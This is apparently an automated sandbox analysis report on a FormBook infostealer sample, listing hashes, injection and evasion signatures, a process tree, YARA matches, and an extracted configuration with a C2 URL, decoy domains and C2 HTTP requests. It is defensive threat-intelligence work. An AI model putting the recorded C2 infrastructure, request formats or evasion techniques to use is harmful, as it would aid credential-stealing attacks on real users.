Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 583475.exe

Overview

General Information

Sample Name:583475.exe
Analysis ID:510246
MD5:721356bfa1f8c23d40f6b2ff77b55db0
SHA1:c4d25b17c64716f2e7558bd302cd901bd63757d8
SHA256:e876c1db90717ff0819f4fc578adace61decdad64963836ebc9ae983dc87a5d6
Tags:exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 583475.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\583475.exe' MD5: 721356BFA1F8C23D40F6B2FF77B55DB0)
    • AddInProcess32.exe (PID: 5540 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autofmt.exe (PID: 4720 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
      • cmstp.exe (PID: 7120 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
        • cmd.exe (PID: 5216 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eeeptou.xyz/uat8/"], "decoy": ["suddennnnnnnnnnnn47.xyz", "fggj99.com", "ojosnegroshacienda.com", "tinyhollywood.com", "marketersmeetup.com", "anushreehomemadeproducts.online", "appsdeals14.com", "ocean-breath-retreat.com", "subin-party.com", "offroad.wiki", "coryfairbanks.com", "algurgpaint.net", "k1snks.com", "florakitchens.com", "tollywoodbold.com", "kzkidz.com", "bequestporfze.xyz", "tiplovellc.com", "city-ad.com", "strombolidefilm.com", "789trangchu.xyz", "transfer-news.pro", "wtv864.com", "seospiders.xyz", "bargaingreat.com", "clarysvillemotel.online", "fbiicrc.com", "pf-hi.com", "perverseonline.com", "hugevari.com", "dilekcaglar.online", "authorakkingsley.com", "cloudlessinc.com", "newjourneypro.com", "vacuumcoolingsouthamerica.com", "oursalesguide.com", "shopsoulandstone.com", "circularsmartcity.com", "segwayw.com", "tackle.tools", "tech-franchisee.com", "ff4c2m3vc.xyz", "nlug.net", "artofadhd.zone", "xfqmwk.xyz", "ossname.xyz", "copost.net", "kokosiborsel.quest", "abbastanza.info", "eyehealthtnpasumo4.xyz", "mashburnblog.com", "looped.agency", "atlasgsllc.com", "nimbleiter.com", "nzaz2.xyz", "varundeshpande.com", "foodbevtech.com", "cassandrajasmine.net", "taxunite.com", "hannahhirsh.com", "stonebay.pizza", "xh-kd.com", "tealdazzleshop.com", "wkpnmqfb.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x7c38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7fc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x13cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x137c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x13dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x13f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x89da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12a3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9752:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x191c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.0.AddInProcess32.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.0.AddInProcess32.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.0.AddInProcess32.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        7.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 7120, ProcessCommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', ProcessId: 5216

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.eeeptou.xyz/uat8/"], "decoy": ["suddennnnnnnnnnnn47.xyz", "fggj99.com", "ojosnegroshacienda.com", "tinyhollywood.com", "marketersmeetup.com", "anushreehomemadeproducts.online", "appsdeals14.com", "ocean-breath-retreat.com", "subin-party.com", "offroad.wiki", "coryfairbanks.com", "algurgpaint.net", "k1snks.com", "florakitchens.com", "tollywoodbold.com", "kzkidz.com", "bequestporfze.xyz", "tiplovellc.com", "city-ad.com", "strombolidefilm.com", "789trangchu.xyz", "transfer-news.pro", "wtv864.com", "seospiders.xyz", "bargaingreat.com", "clarysvillemotel.online", "fbiicrc.com", "pf-hi.com", "perverseonline.com", "hugevari.com", "dilekcaglar.online", "authorakkingsley.com", "cloudlessinc.com", "newjourneypro.com", "vacuumcoolingsouthamerica.com", "oursalesguide.com", "shopsoulandstone.com", "circularsmartcity.com", "segwayw.com", "tackle.tools", "tech-franchisee.com", "ff4c2m3vc.xyz", "nlug.net", "artofadhd.zone", "xfqmwk.xyz", "ossname.xyz", "copost.net", "kokosiborsel.quest", "abbastanza.info", "eyehealthtnpasumo4.xyz", "mashburnblog.com", "looped.agency", "atlasgsllc.com", "nimbleiter.com", "nzaz2.xyz", "varundeshpande.com", "foodbevtech.com", "cassandrajasmine.net", "taxunite.com", "hannahhirsh.com", "stonebay.pizza", "xh-kd.com", "tealdazzleshop.com", "wkpnmqfb.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: 583475.exeJoe Sandbox ML: detected
          Source: 7.0.AddInProcess32.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.AddInProcess32.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.AddInProcess32.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 583475.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
          Source: 583475.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then jmp 067C8B79h
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.appsdeals14.com
          Source: C:\Windows\explorer.exeDomain query: www.tinyhollywood.com
          Source: C:\Windows\explorer.exeNetwork Connect: 68.66.224.28 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.eeeptou.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.eeeptou.xyz/uat8/
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1Host: www.tinyhollywood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1Host: www.appsdeals14.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 14:30:57 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774856-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 14:31:02 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1E
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/gE
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobjE
          Source: 583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.d
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
          Source: unknownDNS traffic detected: queries for: www.google.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1Host: www.tinyhollywood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1Host: www.appsdeals14.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
